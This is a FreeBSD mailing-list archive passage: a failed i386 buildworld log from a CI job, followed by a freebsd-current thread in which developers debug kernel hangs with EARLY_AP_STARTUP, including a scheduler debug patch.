-I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.version.o -MTversion.o -std=3Dgnu99 -fstack-protector-strong -Wno-point= er-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wn= o-tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unu= sed-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wn= o-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argume= nts -c version.c -o version.o --- all_subdir_usr.bin --- --- all_subdir_usr.bin/gprof --- --- printlist.o --- cc -O2 -pipe -g -MD -MF.depend.printlist.o -MTprintlist.o -std=3Dgnu99 = -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-em= pty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-= compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-function -W= no-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -= Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/sr= c/usr.bin/gprof/printlist.c -o printlist.o --- all_subdir_usr.sbin --- --- libntp.a --- building static ntp library ar -crD libntp.a `NM=3D'nm' NMFLAGS=3D'' lorder systime.o a_md5encrypt.o ad= jtime.o atoint.o atolfp.o atouint.o audio.o authkeys.o authreadkeys.o authu= sekey.o bsd_strerror.o buftvtots.o caljulian.o caltontp.o calyearstart.o cl= ocktime.o clocktypes.o decodenetnum.o dofptoa.o dolfptoa.o emalloc.o findco= nfig.o getopt.o hextoint.o hextolfp.o humandate.o icom.o iosignal.o is_ip_a= ddress.o lib_strbuf.o machines.o mktime.o modetoa.o mstolfp.o msyslog.o net= of.o ntp_calendar.o ntp_crypto_rnd.o ntp_intres.o ntp_libopts.o ntp_lineedi= t.o ntp_random.o ntp_rfc2553.o ntp_worker.o numtoa.o numtohost.o octtoint.o= prettydate.o recvbuff.o refidsmear.o refnumtoa.o snprintf.o socket.o sockt= oa.o socktohost.o ssl_init.o statestr.o strdup.o strl_obsd.o syssignal.o ti= metoa.o timevalops.o uglydate.o vint64ops.o work_fork.o work_thread.o ymd2y= d.o assertions.o buffer.o backtrace-emptytbl.o backtrace.o error.o event.o = inet_ntop.o inet_pton.o lib.o log.o md5.o netaddr.o netscope.o ondestroy.o = random.o result.o task.o sha1.o sockaddr.o msgcat.o condition.o thread.o mu= tex.o dir.o errno2result.o file.o interfaceiter.o net.o stdio.o stdtime.o s= trerror.o time.o tsmemcmp.o version.o | tsort -q`=20 --- all_subdir_usr.bin --- --- all_subdir_usr.bin/indent --- --- pr_comment.o --- cc -O2 -pipe -g -MD -MF.depend.pr_comment.o -MTpr_comment.o -std=3Dgnu9= 9 -fstack-protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -= W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-= arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-= parameter -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredund= ant-decls -Wold-style-definition -Wno-pointer-sign -Wthread-safety -Wno-emp= ty-body -Wno-string-plus-int -Wno-unused-const-variable -Qunused-arguments= -c /usr/src/usr.bin/indent/pr_comment.c -o pr_comment.o --- all_subdir_usr.bin/gprof --- --- kernel.o --- cc -O2 -pipe -g -MD -MF.depend.kernel.o -MTkernel.o -std=3Dgnu99 -fstac= k-protector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-bo= dy -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-compar= e -Wno-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enu= m-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-kn= r-promoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.= bin/gprof/kernel.c -o kernel.o --- all_subdir_usr.sbin --- ranlib -D libntp.a --- all_subdir_usr.sbin/ntp/ntpd --- =3D=3D=3D> usr.sbin/ntp/ntpd (all) --- all_subdir_usr.bin --- --- gprof.full --- cc -O2 -pipe -g -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Wer= ror -Wno-pointer-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-cons= t-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-equ= ality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef -= Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Q= unused-arguments -o gprof.full gprof.o aout.o arcs.o dfn.o elf.o lookup.o = hertz.o printgprof.o printlist.o kernel.o =20 --- all_subdir_usr.sbin --- --- version.c --- sh -e /usr/src/usr.sbin/ntp/ntpd/../scripts/mkver ntpd Version --- .depend --- echo ntpd.full: /usr/obj/usr/src/tmp/usr/lib/libc.a /usr/obj/usr/src/usr.sb= in/ntp/libparse/libparse.a /usr/obj/usr/src/usr.sbin/ntp/libntp/libntp.a /u= sr/obj/usr/src/tmp/usr/lib/libm.a /usr/obj/usr/src/usr.sbin/ntp/libopts/lib= opts.a /usr/obj/usr/src/tmp/usr/lib/libpthread.a /usr/obj/usr/src/tmp/usr/l= ib/libcrypto.a >> .depend --- cmd_args.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/ntpd/../../../contrib/ntp/ntpd -I/= usr/src/usr.sbin/ntp/ntpd/../../../contrib/ntp/include -I/usr/src/usr.sbin= /ntp/ntpd/../../../contrib/ntp/lib/isc/include -I/usr/src/usr.sbin/ntp/ntp= d/../../../contrib/ntp/lib/isc/pthreads/include -I/usr/src/usr.sbin/ntp/nt= pd/../../../contrib/ntp/lib/isc/unix/include -I/usr/src/usr.sbin/ntp/ntpd/= ../../../contrib/ntp/sntp/libopts -I/usr/src/usr.sbin/ntp/ntpd/../ -I/usr= /src/usr.sbin/ntp/ntpd -DSYS_FREEBSD -DPARSE -DHAVE_CONFIG_H -DOPENSSL -DU= SE_OPENSSL_CRYPTO_RAND -DAUTOKEY -g -MD -MF.depend.cmd_args.o -MTcmd_args.= o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -= Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -W= no-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-co= nversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-pr= omoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.sbin= /ntp/ntpd/../../../contrib/ntp/ntpd/cmd_args.c -o cmd_args.o --- all_subdir_usr.bin --- --- gprof.1.gz --- gzip -cn /usr/src/usr.bin/gprof/gprof.1 > gprof.1.gz --- gprof.debug --- objcopy --only-keep-debug gprof.full gprof.debug --- gprof --- objcopy --strip-debug --add-gnu-debuglink=3Dgprof.debug gprof.full gprof --- all_subdir_usr.sbin --- --- all_subdir_usr.sbin/ntp/ntpdc --- =3D=3D=3D> usr.sbin/ntp/ntpdc (all) --- all_subdir_usr.bin --- --- all_subdir_usr.bin/indent --- --- args.o --- cc -O2 -pipe -g -MD -MF.depend.args.o -MTargs.o -std=3Dgnu99 -fstack-pr= otector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unuse= d-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wretu= rn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -W= cast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls -W= old-style-definition -Wno-pointer-sign -Wthread-safety -Wno-empty-body -Wno= -string-plus-int -Wno-unused-const-variable -Qunused-arguments -c /usr/sr= c/usr.bin/indent/args.c -o args.o --- all_subdir_usr.sbin --- --- version.c --- sh -e /usr/src/usr.sbin/ntp/ntpdc/../scripts/mkver ntpdc Version --- .depend --- echo ntpdc.full: /usr/obj/usr/src/tmp/usr/lib/libc.a /usr/obj/usr/src/tmp/u= sr/lib/libedit.a /usr/obj/usr/src/usr.sbin/ntp/libntp/libntp.a /usr/obj/usr= /src/tmp/usr/lib/libm.a /usr/obj/usr/src/usr.sbin/ntp/libopts/libopts.a /us= r/obj/usr/src/tmp/usr/lib/libpthread.a /usr/obj/usr/src/tmp/usr/lib/libcryp= to.a >> .depend --- ntpdc.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/ntpdc/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/ntpdc/../../../contrib/ntp/lib/isc/include -I/usr= /src/usr.sbin/ntp/ntpdc/../../../contrib/ntp/lib/isc/unix/include -I/usr/s= rc/usr.sbin/ntp/ntpdc/../../../contrib/ntp/lib/isc/pthreads/include -I/usr= /src/usr.sbin/ntp/ntpdc/../../../contrib/ntp/sntp/libopts -I/usr/src/usr.s= bin/ntp/ntpdc/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/ntpdc/../ -I/= usr/src/usr.sbin/ntp/ntpdc -DHAVE_LIBEDIT -DHAVE_READLINE_READLINE_H -I/us= r/obj/usr/src/tmp//usr/include/edit -DSYS_FREEBSD -DPARSE -DHAVE_CONFIG_H = -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -g -MD -MF.depend.ntpdc.o -M= Tntpdc.o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-sign -Wno-empty= -body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-com= pare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-= enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno= -knr-promoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/u= sr.sbin/ntp/ntpdc/../../../contrib/ntp/ntpdc/ntpdc.c -o ntpdc.o --- all_subdir_usr.bin --- --- all_subdir_usr.bin/elfcopy --- --- symbols.o --- cc -O2 -pipe -I/usr/src/contrib/elftoolchain/libelftc -I/usr/src/contrib= /elftoolchain/libpe -I/usr/src/contrib/elftoolchain/common -DWITH_PE=3D1 -I= . -g -MD -MF.depend.symbols.o -MTsymbols.o -std=3Dgnu99 -fstack-protector-= strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-parame= ter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-type = -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast-ali= gn -Wno-pointer-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const= -variable -Qunused-arguments -c /usr/src/contrib/elftoolchain/elfcopy/sym= bols.c -o symbols.o --- all_subdir_usr.bin/indent --- --- indent.full --- cc -O2 -pipe -g -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Wer= ror -Wall -Wno-format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmi= ssing-prototypes -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings = -Wswitch -Wshadow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winlin= e -Wnested-externs -Wredundant-decls -Wold-style-definition -Wno-pointer-si= gn -Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-v= ariable -Qunused-arguments -o indent.full indent.o io.o lexi.o parse.o pr_= comment.o args.o =20 --- indent.1.gz --- gzip -cn /usr/src/usr.bin/indent/indent.1 > indent.1.gz --- indent.debug --- objcopy --only-keep-debug indent.full indent.debug --- indent --- objcopy --strip-debug --add-gnu-debuglink=3Dindent.debug indent.full inden= t --- all_subdir_usr.sbin --- --- all_subdir_usr.sbin/pmcstudy --- =3D=3D=3D> usr.sbin/pmcstudy (all) --- all_subdir_usr.sbin/ntp --- --- all_subdir_usr.sbin/ntp/ntpd --- --- ntp_config.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/ntpd/../../../contrib/ntp/ntpd -I/= usr/src/usr.sbin/ntp/ntpd/../../../contrib/ntp/include -I/usr/src/usr.sbin= /ntp/ntpd/../../../contrib/ntp/lib/isc/include -I/usr/src/usr.sbin/ntp/ntp= d/../../../contrib/ntp/lib/isc/pthreads/include -I/usr/src/usr.sbin/ntp/nt= pd/../../../contrib/ntp/lib/isc/unix/include -I/usr/src/usr.sbin/ntp/ntpd/= ../../../contrib/ntp/sntp/libopts -I/usr/src/usr.sbin/ntp/ntpd/../ -I/usr= /src/usr.sbin/ntp/ntpd -DSYS_FREEBSD -DPARSE -DHAVE_CONFIG_H -DOPENSSL -DU= SE_OPENSSL_CRYPTO_RAND -DAUTOKEY -g -MD -MF.depend.ntp_config.o -MTntp_con= fig.o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-bo= dy -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-compar= e -Wno-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enu= m-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-kn= r-promoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.= sbin/ntp/ntpd/../../../contrib/ntp/ntpd/ntp_config.c -o ntp_config.o --- all_subdir_usr.sbin/pmcstudy --- --- .depend --- echo pmcstudy.full: /usr/obj/usr/src/tmp/usr/lib/libc.a >> .depend --- pmcstudy.o --- cc -O2 -pipe -Wall -Werror -g -MD -MF.depend.pmcstudy.o -MTpmcstudy.o -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wall -Wno-fo= rmat-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-prototypes = -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow= -Wunused-parameter -Wcast-align -Wchar-subscripts -Winline -Wnested-extern= s -Wredundant-decls -Wold-style-definition -Wno-pointer-sign -Wmissing-vari= able-declarations -Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Qunused-arguments -c /usr/src/usr.sbin/pmcstudy/p= mcstudy.c -o pmcstudy.o /usr/src/usr.sbin/pmcstudy/pmcstudy.c:2326:16: error: unused parameter 'ax'= [-Werror,-Wunused-parameter] do_cpuid(u_int ax, u_int cx, u_int *p) ^ /usr/src/usr.sbin/pmcstudy/pmcstudy.c:2326:26: error: unused parameter 'cx'= [-Werror,-Wunused-parameter] do_cpuid(u_int ax, u_int cx, u_int *p) ^ /usr/src/usr.sbin/pmcstudy/pmcstudy.c:2326:37: error: unused parameter 'p' = [-Werror,-Wunused-parameter] do_cpuid(u_int ax, u_int cx, u_int *p) ^ 3 errors generated. *** [pmcstudy.o] Error code 1 bmake[4]: stopped in /usr/src/usr.sbin/pmcstudy 1 error bmake[4]: stopped in /usr/src/usr.sbin/pmcstudy *** [all_subdir_usr.sbin/pmcstudy] Error code 2 bmake[3]: stopped in /usr/src/usr.sbin --- all_subdir_usr.sbin/ntp --- --- all_subdir_usr.sbin/ntp/ntpdc --- A failure has been detected in another branch of the parallel make bmake[5]: stopped in /usr/src/usr.sbin/ntp/ntpdc *** [all_subdir_usr.sbin/ntp/ntpdc] Error code 2 bmake[4]: stopped in /usr/src/usr.sbin/ntp --- all_subdir_usr.bin --- --- all_subdir_usr.bin/elfcopy --- A failure has been detected in another branch of the parallel make bmake[4]: stopped in /usr/src/usr.bin/elfcopy *** [all_subdir_usr.bin/elfcopy] Error code 2 bmake[3]: stopped in /usr/src/usr.bin 1 error bmake[3]: stopped in /usr/src/usr.bin *** [all_subdir_usr.bin] Error code 2 bmake[2]: stopped in /usr/src --- all_subdir_usr.sbin --- --- all_subdir_usr.sbin/ntp/ntpd --- A failure has been detected in another branch of the parallel make bmake[5]: stopped in /usr/src/usr.sbin/ntp/ntpd *** [all_subdir_usr.sbin/ntp/ntpd] Error code 2 bmake[4]: stopped in /usr/src/usr.sbin/ntp 2 errors bmake[4]: stopped in /usr/src/usr.sbin/ntp *** [all_subdir_usr.sbin/ntp] Error code 2 bmake[3]: stopped in /usr/src/usr.sbin 2 errors bmake[3]: stopped in /usr/src/usr.sbin *** [all_subdir_usr.sbin] Error code 2 bmake[2]: stopped in /usr/src 2 errors bmake[2]: stopped in /usr/src *** [everything] Error code 2 bmake[1]: stopped in /usr/src 1 error bmake[1]: stopped in /usr/src *** [buildworld] Error code 2 make: stopped in /usr/src 1 error make: stopped in /usr/src Build step 'Execute shell' marked build as failure [PostBuildScript] - Execution post build scripts. [FreeBSD_HEAD_i386] $ /bin/sh -xe /tmp/hudson2898269715856720796.sh + export 'PATH=3D/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/b= in' + export 'jname=3DFreeBSD_HEAD_i386' + echo 'clean up jail FreeBSD_HEAD_i386' clean up jail FreeBSD_HEAD_i386 + sudo jail -r FreeBSD_HEAD_i386 + sudo ifconfig igb0 inet6 2610:1c1:1:607c::103:1 -alias + sudo umount FreeBSD_HEAD_i386/usr/src + sudo umount FreeBSD_HEAD_i386/dev + sudo rm -fr FreeBSD_HEAD_i386 + true + sudo chflags -R noschg FreeBSD_HEAD_i386 + sudo rm -fr FreeBSD_HEAD_i386 Email was triggered for: Failure - Any Sending email for trigger: Failure - Any From owner-freebsd-current@freebsd.org Wed Jul 27 22:31:38 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 042F2BA62AA for ; Wed, 27 Jul 2016 22:31:38 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: from mailman.ysv.freebsd.org (mailman.ysv.freebsd.org [IPv6:2001:1900:2254:206a::50:5]) by mx1.freebsd.org (Postfix) with ESMTP id D56AE1BB4 for ; Wed, 27 Jul 2016 22:31:37 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: by mailman.ysv.freebsd.org (Postfix) id D4A6EBA62A9; Wed, 27 Jul 2016 22:31:37 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D4444BA62A8 for ; Wed, 27 Jul 2016 22:31:37 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: from mail-wm0-x232.google.com (mail-wm0-x232.google.com [IPv6:2a00:1450:400c:c09::232]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 60D891BB3; Wed, 27 Jul 2016 22:31:37 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: by mail-wm0-x232.google.com with SMTP id o80so82200815wme.1; Wed, 27 Jul 2016 15:31:37 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:in-reply-to:references:reply-to :mime-version:content-transfer-encoding; bh=vS8RyZeDTSdf7vftI8MSoB9pGJQZnW9D2dSSR9L7Bao=; b=bOnVE9DIZPl92wsseKkmcJUjSFXKDReQE35Qv/rfP97SkNwpK9sbZaooBqCKbO9Djr e+/IbMxvQbMmcZMYOKlHnIpsC9u/tPlkEA6f3k/vi9Hry2uLgMrgmUuAAag0cvbmevyq U4FneUUhPKCrcV2nj/cuXT5wh9SrQNEMMFNnRs4e9wVAdqKdxrRmDnlljPS8Rhb66Ygc hKqwio0LgEtYXsvEwqDBH5FbDSTzrnW1ghky3vk9+I1QNzmYByLJ1g1zHWdzH2dOETX9 kvfplU9sK1p8Z8kfaebAvdD+gFPJsZJFOze0sAdVZMK1cdVXjhthSlVLFqqPXjZreqd/ qDUQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:in-reply-to :references:reply-to:mime-version:content-transfer-encoding; bh=vS8RyZeDTSdf7vftI8MSoB9pGJQZnW9D2dSSR9L7Bao=; b=NEb1i6un1vsAFmkllE9PaNO2ofYA5bgll4ebIdFCQexHhjV5crClNA0yuLplgfxoo/ JW5SeCrk89f42SwHgSogWAcZ1JHGiayByaPdG17fUlUYsp134Glo4NCKhb6VUGYs455I 4zxADM5wLJVLJdBl6ubOWvUSXekTFXMrm3n/TgRl++zMEoyGtrna0Nk9LRBfAuvx+B0Q sNlEObvX2eMQobNfwMu1R1zntM7BnGGWhZNA5HJiX6FVyPmOSVFlY/EzV0SSbkmMD+fx ihb4KNdOK3DpfoeXGlyR1KuESfmr35opTWxlgN7LAhkQu7o4u+uZ72iA4Pkfgt6F4qTu j/MA== X-Gm-Message-State: AEkooutTwt+sWFaIKnGoe+P4oi/IxHUTiyvievXikqBHVb/mXctd5+SsdFUUxFh26/5TKg== X-Received: by 10.194.65.170 with SMTP id y10mr30076357wjs.26.1469658695696; Wed, 27 Jul 2016 15:31:35 -0700 (PDT) Received: from ernst.home (p578E208C.dip0.t-ipconnect.de. [87.142.32.140]) by smtp.gmail.com with ESMTPSA id n131sm37308742wmd.3.2016.07.27.15.31.34 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 27 Jul 2016 15:31:35 -0700 (PDT) Date: Thu, 28 Jul 2016 00:31:31 +0200 From: Gary Jennejohn To: John Baldwin Cc: current@freebsd.org Subject: Re: EARLY_AP_STARTUP hangs during boot Message-ID: <20160728003131.1f67bb78@ernst.home> In-Reply-To: <1758017.P1iqL9uSnF@ralph.baldwin.cx> References: <20160516122242.39249a54@ernst.home> <8812233.S6jxPboLEa@ralph.baldwin.cx> <20160607120654.42d375c7@ernst.home> <1758017.P1iqL9uSnF@ralph.baldwin.cx> Reply-To: gljennjohn@gmail.com X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 22:31:38 -0000 On Wed, 27 Jul 2016 14:43:36 -0700 John Baldwin wrote: > On Tuesday, June 07, 2016 12:06:54 PM Gary Jennejohn wrote: > > On Tue, 31 May 2016 13:10:06 -0700 > > John Baldwin wrote: > > > > > On Saturday, May 28, 2016 02:11:41 PM Gary Jennejohn wrote: > > > > On Fri, 27 May 2016 09:50:05 +0200 > > > > Gary Jennejohn wrote: > > > > > > > > > On Thu, 26 May 2016 16:54:35 -0700 > > > > > John Baldwin wrote: > > > > > > > > > > > On Tuesday, May 17, 2016 06:47:41 PM Gary Jennejohn wrote: > > > > > > > On Mon, 16 May 2016 10:54:19 -0700 > > > > > > > John Baldwin wrote: > > > > > > > > > > > > > > > On Monday, May 16, 2016 12:22:42 PM Gary Jennejohn wrote: > > > > > > > > > I tried out EARLY_AP_STARTUP, but the kernel hangs and I can't > > > > > > > > > break into DDB. > > > > > > > > > > > > > > > > > > I did a verbose boot and the last lines I see are related to routing > > > > > > > > > MSI-X to various local APIC vectors. I copied the last few lines and > > > > > > > > > they look like this: > > > > > > > > > > > > > > > > > > msi: routing MSI-X IRQ 256 to local APIC 2 vector 48 > > > > > > > > > msi: routing MSI-X IRQ 257 to local APIC 3 vector 48 > > > > > > > > > msi: routing MSI-X IRQ 258 to local APIC 4 vector 48 > > > > > > > > > msi: routing MSI-X IRQ 256 to local APIC 0 vector 49 > > > > > > > ^^^^^^^ Assigning > > > > > > > > > > > > > > > > > > I tried disabling msi and msix in /boot/loader.conf, but the settings > > > > > > > > > were ignored (probabaly too early). > > > > > > > > > > > > > > > > No, those settings are not too early. However, the routing to different > > > > > > > > CPUs now happens earlier than it used to. What is the line before the > > > > > > > > MSI lines? You can take a picture with your phone/camera if that's simplest. > > > > > > > > > > > > > > > > > > > > > > Here a few lines before the MSI routing happens: > > > > > > > > > > > > > > hpet0: iomem 0xfed00000-0xfed003ff irq 0,8 on acpi0 > > > > > > > hpet0: vendor 0x4353, rev 0x1, 14318180 Hz, 3 timers, legacy route > > > > > > > hpet0: t0 : irqs 0x00c0ff (0), MSI, periodic > > > > > > > hpet0: t1 : irqs 0x00c0ff (0), MSI, periodic > > > > > > > hpet0: t2 : irqs 0x00c0ff (0), MSI, periodic > > > > > > > Timecounter "HPET" frequency 14318180 Hz quality 950 > > > > > > > > > > > > The assigning message means it is in the loop using > > > > > > bus_bind_intr() to setup per-CPU timers. Can you please try > > > > > > setting 'hint.hpet.0.per_cpu=0' at the loader prompt to see if > > > > > > disabling the use of per-CPU timers allows you to boot? > > > > > > > > > > > > > > > > Something has changed since the last time I generated a kernel with > > > > > this option. > > > > > > > > > > Now I get a NULL-pointer dereference in the kernel, doesn't matter > > > > > whether I set the hint or not. > > > > > > > > > > > > > OK, now that the startup has been fixed, I tried setting the hint at > > > > the loader prompt, but the kenel hangs in exactly the same place as > > > > before. I actually booted twice to make certain I hadn't made a > > > > typo when setting the hint. > > > > > > Humm, it shouldn't be calling bus_bind_intr() if the hint is set. Actually, > > > I guess it just binds them all to first CPU if per-CPU timers aren't set. > > > Can you add debug printfs to hpet_attach() in sys/dev/acpica/acpi_hpet.c to > > > narrow down which line in that function it hangs after? > > > > > > Another option to try is to add the following to your kernel config: > > > > > > options KTR > > > options KTR_COMPILE=KTR_PROC > > > options KTR_MASK=KTR_PROC > > > options KTR_VERBOSE=1 > > > > > > this will spew a lot of crap to the screen, but if it stops spewing when it > > > hangs then it might be tell us where the system is hung. If you have any way > > > to configure a serial console then this would also be useful even if it spews > > > constantly when it is hung (assuming you could log the output of the serial > > > console). > > > > > > > I used the KTR options. > > > > After the Timecounter "HPET" frequency 14318180 Hz quality 950 I see > > > > cpu0 mi_switch: old thread 10000 (swapper) > > cpu0 mi_switch: new thread 10022 (if_config_tqg_0) > > cpu0 sleep_broadcast(0x80002f9a600, 0) > > cpu0 msleep_spin: old thread 100022 > > cpu0 mi_switch: old thread 10022 > > cpu0 mi_switch: new thread 10016 (if_io_tqg_0) > > cpu0 sleep_broadcast(0x80002f9a780, 0) > > cpu0 msleep_spin: old thread 10016 > > cpu0 mi_switch: old thread 10016 > > cpu0 fork_exit: new thread 0x80004239510 (td_sched 0x8000042399d8, pid > > 10, idle: cpu0) > > > > And that's all that came out, really not very much at all. > > Ok, that seems odd. > > Can you apply this patch and run with the KTR output still: > > Index: sched_ule.c > =================================================================== > --- sched_ule.c (revision 303397) > +++ sched_ule.c (working copy) > @@ -1904,6 +1904,13 @@ sched_switch(struct thread *td, struct thread *new > td->td_owepreempt = 0; > if (!TD_IS_IDLETHREAD(td)) > tdq->tdq_switchcnt++; > + > + if (td == &thread0 && cold) { > + printf("thread0 switching out (ts_cpu %d):\n", ts->ts_cpu); > + kdb_backtrace(); > + MPASS(TD_IS_RUNNING(td)); > + } > + > /* > * The lock pointer in an idle thread should never change. Reset it > * to CAN_RUN as well. > @@ -1920,6 +1927,9 @@ sched_switch(struct thread *td, struct thread *new > if (THREAD_CAN_MIGRATE(td) && !THREAD_CAN_SCHED(td, ts->ts_cpu)) > ts->ts_cpu = sched_pickcpu(td, 0); > #endif > + if (td == &thread0 && cold) > + printf("thread0 ts_cpu %d, cpuid %d\n", ts->ts_cpu, > + cpuid); > if (ts->ts_cpu == cpuid) > tdq_runq_add(tdq, td, srqflag); > else { > > Well, now I know that ULE is a prerequiste for EARLY_AP_STARTUP! I wasn't aware of that. I prefer BSD and that's the scheduler I did the first tests with. But with the ULE scheduler the system comes up all the way. It would be nice if the BSD scheduler could also be modified to work with EARLY_AP_STARTUP. -- Gary Jennejohn From owner-freebsd-current@freebsd.org Wed Jul 27 22:55:31 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 5B732BA67EA for ; Wed, 27 Jul 2016 22:55:31 +0000 (UTC) (envelope-from shawn.webb@hardenedbsd.org) Received: from mail-qt0-x22f.google.com (mail-qt0-x22f.google.com [IPv6:2607:f8b0:400d:c0d::22f]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 119761811 for ; Wed, 27 Jul 2016 22:55:31 +0000 (UTC) (envelope-from shawn.webb@hardenedbsd.org) Received: by mail-qt0-x22f.google.com with SMTP id w38so38916641qtb.0 for ; Wed, 27 Jul 2016 15:55:31 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=hardenedbsd-org.20150623.gappssmtp.com; s=20150623; h=date:from:to:cc:subject:message-id:mime-version:content-disposition :user-agent; bh=H/tpH6bV/IojT8ZWqKZHUIwGA0u0tymwUZXC5T07oBY=; 